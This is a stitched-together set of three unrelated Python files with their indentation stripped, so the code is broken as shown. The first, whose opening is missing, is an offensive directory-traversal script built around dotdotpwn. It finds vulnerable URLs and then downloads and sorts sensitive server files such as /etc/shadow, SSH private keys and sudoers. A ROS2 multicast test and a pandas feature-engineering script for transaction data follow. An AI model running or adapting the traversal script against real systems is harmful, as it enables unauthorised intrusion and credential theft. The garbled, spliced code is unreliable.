vulnPage = tmp[2]
vulnStringPrefix = tmp[3]
vulnStringSuffix = tmp[4]
encodedSplit = tmp[5]
try:
xfilFileName = "%s" % args.xfil_files
xfilFile = open(xfilFileName,'r')
for xfil in xfilFile:
if (xfil[0] == "/"):
xfil = xfil[1:]
if ("\n" in xfil):
xfil = xfil[:-1]
xfiltmp = xfil.replace("/", "_") #for outputFile
vulnBasetmp = vulnBase.replace("/", "_") #for outputFile
xfil = xfil.replace("/", encodedSplit)
#2x vulnStringPrefix due to a parsing bug. Additional shouldn't hurt....
fullURL = vulnProto + vulnBase + vulnPage + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
#print "DEBUG: %s" % fullURL
fileContents, status_code = grabFileFromURL(fullURL)
if (status_code == 200):
outputFile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s_%s" % (vulnBasetmp, xfiltmp)
try:
output = open(outputFile, 'w+')
output.write(fileContents)
output.close()
except UnicodeEncodeError:
#print "WARNING: Unicode errors. Forcing ascii, xmlcharrefreplace"
output = open(outputFile, 'w+')
fileContents = fileContents.encode('ascii','xmlcharrefreplace')
output.write(fileContents)
output.close()
except:
raise
except:
raise
sortRetrievedFiles()
time.sleep(1)
sortMostInterestingFiles()
time.sleep(1)
sortEverythingElse()
print "INFO: Downloading of files complete"
def grabFileFromURL(url):
try:
r = requests.get(url)
if (r.status_code == 200):
return r.text, r.status_code
else:
return False, r.status_code
except:
raise
def sortRetrievedFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
sizes = []
moveTheseFiles = []
for item in files:
if os.path.isfile(item):
sizes.append(os.path.getsize(item))
for size in sizes:
if sizes.count(size) > 3:
moveTheseFiles.append(size)
for sizeOfitems in moveTheseFiles:
try:
os.makedirs(str(sizeOfitems))
except:
pass
#print "Warning: Dir already exists"
for items in list(files): #iterate over a copy; matched files are removed from the list below
if os.path.getsize(items) == sizeOfitems:
newpath = "./%s/%s" % (str(sizeOfitems),items)
os.rename(items,newpath)
files.remove(items)
def sortMostInterestingFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
mostInterestingFiles = "passwd","shadow","id_rsa","id_dsa","passdb","samba","ssh","authorized","sudoers","history"
try:
os.makedirs("mostInteresting")
except:
pass
for item in files:
for name in mostInterestingFiles:
if (name in item):
new = "./mostInteresting/%s" % (item)
move(item,new)
break
def sortEverythingElse():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
everythingElse = "etc","var","proc"
try:
for folder in everythingElse:
os.makedirs(folder)
except:
pass
for item in files:
for name in everythingElse:
if (os.path.isdir(item)):
break
if (name in item):
new = "./%s/%s" % (name,item)
move(item,new)
break
##1, grab port
##2, output file cannot have "/" in filename
##3, grab base url, http module doesn't like http://
##4, file has \n causing errors in query, strip those
def parseURL(url):
tmp = url.split(":")
if (len(tmp) == 3):
tmp2 = tmp[2]
port = tmp2.split("/")[0]
if (len(tmp) <= 2):
if ("https" == tmp[0]):
port = "443"
elif ("http" == tmp[0]):
port = "80"
if (len(tmp) > 3): #this should never happen
port = "80"
try:
resultsOut = url.split("/")[2] + url.split("/")[3]
except:
raise
tmp4 = url.split(":")[1]
baseURL = tmp4[2:]
if ("\n" in url):
URL = url[:-1]
else:
URL = url
return port, resultsOut, baseURL, URL
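# rough example (hypothetical URL): parseURL('http://10.1.1.5:8080/index.php?page=TRAVERSAL')
# should yield port '8080', resultsOut '10.1.1.5:8080index.php?page=TRAVERSAL',
# baseURL '10.1.1.5', and the URL itself with any trailing newline stripped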
def setDotPwnOptions():
if (args.os == "unix"):
konfirmString = '"root:"'
if (args.os == "windows"):
konfirmString = '"[fonts]"'
return konfirmString
#will return values to build a string like base+page+pre+path+encodedsplit+userrequestfile+suffix
#let base = IP:Port/
#let vulnPage = page.ext[/|=]
def analyzeVuln(vulnar):
final = []
for vuln in vulnar:
vulnProto = ""
vulnURL = []
vulnBase = ""
vulnPage = ""
vulnStringPrefix = ""
vulnStringSuffix = ""
encodedSplit = ""
tmp = vuln[17:len(vuln)-14] #vuln is entire line from [*] testing url... to <- VULNERABLE
vulnURL.append(tmp)
if ("http://" in tmp):
vulnProto = "http://"
vulnBase = tmp.split("http://")[1]
if ("https://" in tmp):
vulnProto = "https://"
vulnBase = tmp.split("https://")[1]
vulnPagetmp = vulnBase.split("/",1)[1]
vulnBase = vulnBase.split("/",1)[0]
vulnBase = vulnBase + "/"
#print "DEBUG: vulnBase %s" % vulnBase
#print "DEBUG: vulnPagetmp: %s" % vulnPagetmp
if ("=" in vulnPagetmp): #vulnPage with param, ie 'index.php?arg='
vulnPage = vulnPagetmp.split("=",1)[0]
vulnPage = vulnPage + "="
vulnStringPrefixtmp = vulnPagetmp.split("=",1)[1]
else: #vulnPage with no param, ie index.php/
vulnPage = vulnPagetmp.split("/",2)[0]
vulnPage = vulnPage + "/"
#print "DEBUG: vulnPagetmpsplit %s" % vulnPagetmp.split("/",2)
vulnStringPrefixtmp = vulnPagetmp.split("/",2)[len(vulnPagetmp.split("/",2))-1]
#print "DEBUG: vulnStringPrefixtmp: %s" %vulnStringPrefixtmp
if (args.os == 'unix'): #looking for passwd and issue, user specified file not available yet
vulnStringPrefix = vulnStringPrefixtmp.split("etc")[0]
encodedSplittmp = vulnStringPrefixtmp.split("etc")[1]
if ("passwd" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("passwd")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if ("issue" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("issue")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if (args.os == 'windows'):
print "Error: Windows not supported for file exfil yet"
sys.exit(1)
vals = vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit
print "DEBUG: Make sure these values are correct: vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit"
print vals
final.append(vals)
return final
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Rough script to handle discovery of and exfiltration of data through directory traversal. Recommend invoke with: dirTrav <URLs> <os> -sr')
parser.add_argument('-d', '--scan-depth', type=int, action="store", dest="depth", default=10, help="depth of ../../../ to extend to, default of 10")
parser.add_argument('-e', '--extensions', type=str, action="store", dest="extensions", default='".html"', help='extensions appended at the end of each fuzz string (e.g. \'".php", ".jpg", ".inc"\' Entire list needs to be encased in single quotes. Each extension needs to be in double quotes. There needs to be a comma and a space between each extension)')
parser.add_argument('file', type=str, help="file with URLs to fuzz")
parser.add_argument('os', type=str, action="store", help="OS greatly helps reduce false positives and reduces scan time. 'windows' or 'unix'")
parser.add_argument('-s', '--scan', action="store_true", dest="scan", default="true", help="scan the target for directory traversal")
parser.add_argument('-sr', '--scan-and-retrieve', nargs='?', const='true', default='false', dest="scan_and_retrieve", help="scan and retrieve files if a directory traversal is found")
parser.add_argument('-x', '--xfil-files', type=str, action="store", dest="xfil_files", default="/root/lists/Personal/DirTrav/linux_all.txt", help="list of files to retrieve if a directory traversal vulnerability is found. Default is linux_all.txt.")
args = parser.parse_args()
#print args
vuln = []
inputFileName = "%s" % args.file
if (args.os == "windows"):
if ("linux_all.txt" in args.xfil_files):
print "Error: Will not retrieve linux files from Windows. Set os to Linux or pass a file with Windows files to -x"
raise
if (args.os == "linux"):
if ("windows_all.txt" in args.xfil_files):
print "Error: Will not retrieve windows files from Linux. Set os to Windows or pass a file with Linux files to -x"
raise
if (args.scan):
try:
inputFile = open(inputFileName,'r')
jobs = []
print "INFO: Starting Dotdotpwn"
for URL in inputFile:
if ("\n" in URL):
URL = URL[:-1]
if (URL[0] != "#"):
#print "Processing %s" % URL
p = multiprocessing.Process(target=dotPwn, args=(URL,))
jobs.append(p)
p.start()
inputFile.close()
except:
raise
test_api.py
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from ros2multicast.api import receive
from ros2multicast.api import send
def test_api():
sent_data = b'test_api'
received_data = None
def target():
nonlocal received_data
received_data, _ = receive(timeout=1.0)
t = threading.Thread(target=target)
t.start()
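# give the receiver thread a moment to start listening before sending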
time.sleep(0.1)
send(sent_data)
t.join()
assert sent_data == received_data
generate_main.py
# %%
import os
import pandas as pd
import numpy as np
import threading
import time
base_dir = os.getcwd()
# %%
# Initialize the header (feature column names)
header = ['user', 'n_op', 'n_trans', 'op_type_0', 'op_type_1', 'op_type_2', 'op_type_3', 'op_type_4', 'op_type_5',
'op_type_6', 'op_type_7', 'op_type_8', 'op_type_9', 'op_type_perc', 'op_type_std', 'op_type_n', 'op_mode_0',
'op_mode_1', 'op_mode_2', 'op_mode_3', 'op_mode_4', 'op_mode_5', 'op_mode_6', 'op_mode_7', 'op_mode_8',
'op_mode_9', 'op_mode_perc', 'op_mode_std', 'op_mode_n', 'op_device_perc', 'op_device_std',
'op_device_nan_perc', 'op_device_n', 'op_ip_perc', 'op_ip_std', 'op_ip_nan_perc', 'op_ip_n', 'op_net_type_0',
'op_net_type_1', 'op_net_type_2', 'op_net_type_3', 'op_net_type_perc', 'op_net_type_std',
'op_net_type_nan_perc', 'op_channel_0', 'op_channel_1', 'op_channel_2', 'op_channel_3', 'op_channel_4',
'op_channel_perc', 'op_channel_std', 'op_channel_n', 'op_ip_3_perc', 'op_ip_3_std', 'op_ip_3_nan_perc',
'op_ip_3_n', 'op_ip_3_ch_freq', 'op_ip_48h_n', 'op_device_48h_n',
'op_48h_n', 'trans_platform_0', 'trans_platform_1', 'trans_platform_2', 'trans_platform_3',
'trans_platform_4', 'trans_platform_5', 'trans_platform_perc', 'trans_platform_std', 'trans_platform_n',
'trans_tunnel_in_0', 'trans_tunnel_in_1', 'trans_tunnel_in_2', 'trans_tunnel_in_3', 'trans_tunnel_in_4',
'trans_tunnel_in_5', 'trans_tunnel_in_perc', 'trans_tunnel_in_std', 'trans_tunnel_in_n',
'trans_tunnel_in_nan_perc', 'trans_tunnel_out_0', 'trans_tunnel_out_1', 'trans_tunnel_out_2',
'trans_tunnel_out_3', 'trans_tunnel_out_perc', 'trans_tunnel_out_std', 'trans_tunnel_n', 'trans_amount_max',
'trans_amount_avg', 'trans_amount_std', 'trans_type1_0', 'trans_type1_1', 'trans_type1_2', 'trans_type1_3',
'trans_type1_4', 'trans_type1_perc', 'trans_type1_std', 'trans_ip_perc', 'trans_ip_std', 'trans_ip_nan_perc',
'trans_ip_n', 'trans_type2_0', 'trans_type2_1', 'trans_type2_2', 'trans_type2_3', 'trans_type2_4',
'trans_type2_perc', 'trans_type2_std', 'trans_ip_3_perc', 'trans_ip_3_std', 'trans_ip_3_nan_perc',
'trans_ip_3_n', 'trans_ip_3_ch_freq',
'trans_amount_48h_n', 'trans_48h_n', 'trans_platform_48h_n', 'trans_ip_48h_n']
print(len(header))
# %%
feature_train = pd.DataFrame(columns=header)
feature_test_a = pd.DataFrame(columns=header)
feature_test_b = pd.DataFrame(columns=header)
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
train_op_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_op.csv')
train_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_trans.csv')
test_a_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_a_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_op.csv')
test_a_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_trans.csv')
test_b_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_base.csv')
test_b_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_op.csv')
test_b_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_trans.csv')
n_train = len(train_base_df)
n_test_a = len(test_a_base_df)
n_test_b = len(test_b_base_df)
# %%
# load encoder
op_type = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_type.csv')
mp_op_type = {}
for col in op_type.columns.values:
mp_op_type[col] = op_type[col].values
op_mode = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_mode.csv')
mp_op_mode = {}
for col in op_mode.columns.values:
mp_op_mode[col] = op_mode[col].values
net_type = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_net_type.csv')
mp_net_type = {}
for col in net_type.columns.values:
mp_net_type[col] = net_type[col].values
channel = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_op_channel.csv')
mp_channel = {}
for col in channel.columns.values:
mp_channel[col] = channel[col].values
platform = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_platform.csv')
mp_platform = {}
for col in platform.columns.values:
mp_platform[col] = platform[col].values
tunnel_in = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_tunnel_in.csv')
mp_tunnel_in = {}
for col in tunnel_in.columns.values:
mp_tunnel_in[col] = tunnel_in[col].values
tunnel_out = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_tunnel_out.csv')
mp_tunnel_out = {}
for col in tunnel_out.columns.values:
mp_tunnel_out[col] = tunnel_out[col].values
type1 = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_type1.csv')
mp_type1 = {}
for col in type1.columns.values:
mp_type1[col] = type1[col].values
type2 = pd.read_csv(base_dir + '/dataset/dataset2/encoders/enc_trans_type2.csv')
mp_type2 = {}
for col in type2.columns.values:
mp_type2[col] = type2[col].values
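# each mp_* dict maps a categorical value (a column name in the enc_*.csv file) to that
# column's vector of values; process() below looks up the per-user mode of each field and
# extends the feature row with this fixed-length code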
# %%
def process(n, isTrain=True, isA=False):
for i in range(n):
if i % 1000 == 0:
print("train - " if isTrain else "test_a - " if isA else "test_b - ", end='')
print(i)
if isTrain:
cur_user = train_base_df['user'].loc[i]
tr_trans_user = train_trans_df[train_trans_df['user'] == cur_user] # this user's trans records
tr_op_user = train_op_df[train_op_df['user'] == cur_user] # this user's op records
elif isA:
cur_user = test_a_base_df['user'].loc[i]
tr_trans_user = test_a_trans_df[test_a_trans_df['user'] == cur_user] # this user's trans records
tr_op_user = test_a_op_df[test_a_op_df['user'] == cur_user] # this user's op records
else:
cur_user = test_b_base_df['user'].loc[i]
tr_trans_user = test_b_trans_df[test_b_trans_df['user'] == cur_user] # this user's trans records
tr_op_user = test_b_op_df[test_b_op_df['user'] == cur_user] # this user's op records
n_tr_trans_user = len(tr_trans_user) # number of trans records for this user
n_tr_op_user = len(tr_op_user) # number of op records for this user
line = [cur_user, n_tr_op_user, n_tr_trans_user] # one row: all derived features for the current user
if n_tr_op_user > 0:
### op_type
mode_op_type = tr_op_user['op_type'].mode()[0]
code = mp_op_type[mode_op_type]
line.extend(code)
line.append(sum(tr_op_user['op_type'].apply(lambda x: 1 if x == mode_op_type else 0)) / n_tr_op_user)
s = tr_op_user['op_type'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### op_mode
mode_op_mode = tr_op_user['op_mode'].mode()[0]
code = mp_op_mode[mode_op_mode]
line.extend(code)
line.append(sum(tr_op_user['op_mode'].apply(lambda x: 1 if x == mode_op_mode else 0)) / n_tr_op_user)
s = tr_op_user['op_mode'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### op_device
mode_op_device = tr_op_user['op_device'].mode()[0]
line.append(sum(tr_op_user['op_device'].apply(lambda x: 1 if x == mode_op_device else 0)) / n_tr_op_user)
s = tr_op_user['op_device'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['op_device'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### op_ip
mode_op_ip = tr_op_user['ip'].mode()[0]
line.append(sum(tr_op_user['ip'].apply(lambda x: 1 if x == mode_op_ip else 0)) / n_tr_op_user)
s = tr_op_user['ip'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['ip'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['ip'].apply(lambda x: 1 if x == 'ip_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### op_net_type
mode_op_net_type = tr_op_user['net_type'].mode()[0]
code = mp_net_type[mode_op_net_type]
line.extend(code)
line.append(sum(tr_op_user['net_type'].apply(lambda x: 1 if x == mode_op_net_type else 0)) / n_tr_op_user)
s = tr_op_user['net_type'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['net_type'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user)
### channel
mode_op_channel = tr_op_user['channel'].mode()[0]
code = mp_channel[mode_op_channel]
line.extend(code)
line.append(sum(tr_op_user['channel'].apply(lambda x: 1 if x == mode_op_channel else 0)) / n_tr_op_user)
s = tr_op_user['channel'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### ip_3
mode_op_ip_3 = tr_op_user['ip_3'].mode()[0]
line.append(sum(tr_op_user['ip_3'].apply(lambda x: 1 if x == mode_op_ip_3 else 0)) / n_tr_op_user)
s = tr_op_user['ip_3'].value_counts()
line.append(np.std(s.values))
# line.append(tr_op_user['ip_3'].isnull().sum() / n_tr_op_user)
line.append(sum(tr_op_user['ip_3'].apply(lambda x: 1 if x == 'ip_3_nan' else 0)) / n_tr_op_user)
line.append(len(s))
### sort by tm_diff
tr_op_user.sort_values('tm_diff', inplace=True)
cnt = 0
l = tr_op_user['ip_3'].values
pre = l[0]
for j in range(1, n_tr_op_user):
if l[j] != pre:
pre = l[j]
cnt += 1
line.append(cnt)
### max number of distinct ips, distinct op_devices, and op records within any 48h window
tr_op_tm_max = tr_op_user['tm_diff'].values.max()
tr_op_tm_min = tr_op_user['tm_diff'].values.min()
gap = 48 * 3600
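# note: the window advances in whole 48h steps (start = end below), so these are
# non-overlapping 48h blocks rather than a sliding window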
start = tr_op_tm_min
end = start + gap
max_48h_ip_n = 0
max_48h_op_device_n = 0
max_48h_op_n = 0
while start <= tr_op_tm_max:
gap_df = tr_op_user[(start <= tr_op_user['tm_diff']) & (tr_op_user['tm_diff'] < end)]
max_48h_ip_n = max(max_48h_ip_n, gap_df['ip'].nunique())
max_48h_op_device_n = max(max_48h_op_device_n, gap_df['op_device'].nunique())
max_48h_op_n = max(max_48h_op_n, len(gap_df))
start = end
end += gap
line.extend([max_48h_ip_n, max_48h_op_device_n, max_48h_op_n])
else:
line.extend([-1] * 57)
if n_tr_trans_user > 0:
### platform
mode_trans_platform = tr_trans_user['platform'].mode()[0]
code = mp_platform[mode_trans_platform]
line.extend(code)
line.append(
sum(tr_trans_user['platform'].apply(lambda x: 1 if x == mode_trans_platform else 0)) / n_tr_trans_user)
s = tr_trans_user['platform'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### tunnel_in
mode_trans_tunnel_in = tr_trans_user['tunnel_in'].mode()[0]
code = mp_tunnel_in[mode_trans_tunnel_in]
line.extend(code)
line.append(sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == mode_trans_tunnel_in else 0)) / n_tr_trans_user)
s = tr_trans_user['tunnel_in'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
# line.append(tr_trans_user['tunnel_in'].isnull().sum() / n_tr_trans_user)
line.append(
sum(tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user)
### tunnel_out
mode_trans_tunnel_out = tr_trans_user['tunnel_out'].mode()[0]
code = mp_tunnel_out[mode_trans_tunnel_out]
line.extend(code)
line.append(sum(
tr_trans_user['tunnel_out'].apply(lambda x: 1 if x == mode_trans_tunnel_out else 0)) / n_tr_trans_user)
s = tr_trans_user['tunnel_out'].value_counts()
line.append(np.std(s.values))
line.append(len(s))
### amount
s = tr_trans_user['amount']
line.append(s.values.max())
line.append(s.values.mean())
line.append(s.values.std())
### type1
mode_trans_type1 = tr_trans_user['type1'].mode()[0]
code = mp_type1[mode_trans_type1]
line.extend(code)
line.append(
sum(tr_trans_user['type1'].apply(lambda x: 1 if x == mode_trans_type1 else 0)) / n_tr_trans_user)
s = tr_trans_user['type1'].value_counts()
line.append(np.std(s.values))
### trans_ip
mode_trans_ip = tr_trans_user['ip'].mode()[0]
line.append(sum(tr_trans_user['ip'].apply(lambda x: 1 if x == mode_trans_ip else 0)) / n_tr_trans_user)
s = tr_trans_user['ip'].value_counts()
line.append(np.std(s.values))
# line.append(tr_trans_user['ip'].isnull().sum() / n_tr_trans_user)
line.append(sum(tr_trans_user['ip'].apply(lambda x: 1 if x == 'ip_nan' else 0)) / n_tr_trans_user)
line.append(len(s))
### type2
mode_trans_type2 = tr_trans_user['type2'].mode()[0]
code = mp_type2[mode_trans_type2]
line.extend(code)
line.append(
sum(tr_trans_user['type2'].apply(lambda x: 1 if x == mode_trans_type2 else 0)) / n_tr_trans_user)
s = tr_trans_user['type2'].value_counts()
line.append(np.std(s.values))
### trans_ip_3
mode_trans_ip_3 = tr_trans_user['ip_3'].mode()[0]
line.append(sum(tr_trans_user['ip_3'].apply(lambda x: 1 if x == mode_trans_ip_3 else 0)) / n_tr_trans_user)
s = tr_trans_user['ip_3'].value_counts()
line.append(np.std(s.values))
line.append(sum(tr_trans_user['ip_3'].apply(lambda x: 1 if x == 'ip_3_nan' else 0)) / n_tr_trans_user)
line.append(len(s))
### sort by tm_diff
tr_trans_user.sort_values('tm_diff', inplace=True)
cnt = 0
l = tr_trans_user['ip_3'].values
pre = l[0]
for j in range(1, n_tr_trans_user):
if l[j] != pre:
pre = l[j]
cnt += 1
line.append(cnt)
### max total amount, trans count, distinct platform count, and distinct ip count within any 48h window
tr_trans_tm_max = tr_trans_user['tm_diff'].values.max()
tr_trans_tm_min = tr_trans_user['tm_diff'].values.min()
gap = 48 * 3600
start = tr_trans_tm_min
end = start + gap
max_48h_sum_amount = 0
max_48h_trans_n = 0
max_48h_platform_n = 0
max_48h_ip_n = 0
while start <= tr_trans_tm_max:
gap_df = tr_trans_user[(start <= tr_trans_user['tm_diff']) & (tr_trans_user['tm_diff'] < end)]
max_48h_sum_amount = max(max_48h_sum_amount, gap_df['amount'].values.sum())
max_48h_trans_n = max(max_48h_trans_n, len(gap_df))
max_48h_platform_n = max(max_48h_platform_n, gap_df['platform'].nunique())
max_48h_ip_n = max(max_48h_ip_n, gap_df['ip'].nunique())
start = end
end += gap
line.extend([max_48h_sum_amount, max_48h_trans_n, max_48h_platform_n, max_48h_ip_n])
else:
line.extend([-1] * 56)
# print(len(line))
### append the row to the feature matrix
if isTrain:
feature_train.loc[len(feature_train)] = line
elif isA:
feature_test_a.loc[len(feature_test_a)] = line
else:
feature_test_b.loc[len(feature_test_b)] = line
# save
if isTrain:
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
elif isA:
feature_test_a.to_csv(base_dir + '/dataset/dataset2/testset/feature_test_a.csv', index=False)
else:
feature_test_b.to_csv(base_dir + '/dataset/dataset2/testset/feature_test_b.csv', index=False)
# %%
process(n_train, isTrain=True)
process(n_test_a, isTrain=False, isA=True)
process(n_test_b, isTrain=False, isA=False)
# %%
# Multithreading
def process_threaded(n_train, n_test_a, n_test_b):
def process1():
process(n_train, isTrain=True)
def process2():
process(n_test_a, isTrain=False, isA=True)
def process3():
process(n_test_b, isTrain=False, isA=False)
t1 = threading.Thread(target=process1)
t1.start()
t2 = threading.Thread(target=process2)
t2.start()
t3 = threading.Thread(target=process3)
t3.start()
# %%
process_threaded(n_train, n_test_a, n_test_b)
# %%
# Merge into the main matrix
### the following six lines can be skipped
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test_a = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test_a.csv')
feature_test_b = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test_b.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
test_a_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_b_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_b_base.csv')
feature_train = feature_train.drop(labels='user', axis=1)
feature_test_a = feature_test_a.drop(labels='user', axis=1)
feature_test_b = feature_test_b.drop(labels='user', axis=1)
train_base_df = train_base_df.join(feature_train)
test_a_base_df = test_a_base_df.join(feature_test_a)
test_b_base_df = test_b_base_df.join(feature_test_b)
train_base_df.to_csv(base_dir + '/dataset/dataset2/trainset/train_main.csv', index=False)
test_a_base_df.to_csv(base_dir + '/dataset/dataset2/testset/test_a_main.csv', index=False)
test_b_base_df.to_csv(base_dir + '/dataset/dataset2/testset/test_b_main.csv', index=False)
# %%
# ####################### the section below is for quick experimentation only ########################### #
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv')
feature_train = feature_train.drop(labels=['op_freq', 'op_ip_freq', 'op_ip_3_freq', 'trans_freq', 'trans_amount_freq',
'trans_ip_freq', 'trans_ip_3_freq'], axis=1)
feature_test = feature_test.drop(labels=['op_freq', 'op_ip_freq', 'op_ip_3_freq', 'trans_freq', 'trans_amount_freq',
'trans_ip_freq', 'trans_ip_3_freq'], axis=1)
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
feature_test.to_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv', index=False)
# %%
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
feature_test = pd.read_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
train_op_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_op.csv')
train_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_trans.csv')
test_base_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_base.csv')
test_op_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_op.csv')
test_trans_df = pd.read_csv(base_dir + '/dataset/dataset2/testset/test_a_trans.csv')
n_train = len(train_base_df)
n_test = len(test_base_df)
for i in range(n_train):
if i % 1000 == 0:
print(i)
cur_user = train_base_df['user'].loc[i]
tr_trans_user = train_trans_df[train_trans_df['user'] == cur_user] # this user's trans records
tr_op_user = train_op_df[train_op_df['user'] == cur_user] # this user's op records
n_tr_trans_user = len(tr_trans_user) # number of trans records for this user
n_tr_op_user = len(tr_op_user) # number of op records for this user
if n_tr_op_user > 0:
feature_train['op_device_nan_perc'].loc[i] = sum(
tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user
feature_train['op_net_type_nan_perc'].loc[i] = sum(
tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user
if n_tr_trans_user > 0:
feature_train['trans_tunnel_in_nan_perc'].loc[i] = sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user
for i in range(n_test):
if i % 1000 == 0:
print(i)
cur_user = test_base_df['user'].loc[i]
tr_trans_user = test_trans_df[test_trans_df['user'] == cur_user]  # trans records for this user
tr_op_user = test_op_df[test_op_df['user'] == cur_user]  # op records for this user
n_tr_trans_user = len(tr_trans_user)  # number of trans records for this user
n_tr_op_user = len(tr_op_user)  # number of op records for this user
if n_tr_op_user > 0:
feature_test.loc[i, 'op_device_nan_perc'] = sum(
tr_op_user['op_device'].apply(lambda x: 1 if x == 'op_device_nan' else 0)) / n_tr_op_user
feature_test.loc[i, 'op_net_type_nan_perc'] = sum(
tr_op_user['net_type'].apply(lambda x: 1 if x == 'net_type_nan' else 0)) / n_tr_op_user
if n_tr_trans_user > 0:
feature_test.loc[i, 'trans_tunnel_in_nan_perc'] = sum(
tr_trans_user['tunnel_in'].apply(lambda x: 1 if x == 'tunnel_in_nan' else 0)) / n_tr_trans_user
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
feature_test.to_csv(base_dir + '/dataset/dataset2/testset/feature_test.csv', index=False)
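# %%
# Illustrative sketch (an assumption, not part of the original pipeline): the per-row loops above
# compute, for each user, the share of 'op_device_nan' / 'net_type_nan' / 'tunnel_in_nan' records.
# The same features could be obtained with a single groupby per table; `op_df` / `trans_df` stand
# for train_op_df / train_trans_df (or their test-set equivalents).
def _nan_perc_by_user(op_df, trans_df):
    op_nan = op_df.assign(
        op_device_nan_perc=(op_df['op_device'] == 'op_device_nan').astype(float),
        op_net_type_nan_perc=(op_df['net_type'] == 'net_type_nan').astype(float),
    ).groupby('user')[['op_device_nan_perc', 'op_net_type_nan_perc']].mean()
    trans_nan = trans_df.assign(
        trans_tunnel_in_nan_perc=(trans_df['tunnel_in'] == 'tunnel_in_nan').astype(float),
    ).groupby('user')[['trans_tunnel_in_nan_perc']].mean()
    return op_nan, trans_nan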
# %%
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
for i in range(len(feature_train)):
if i % 1000 == 0:
print(i)
if feature_train['n_op'].loc[i] == 0:
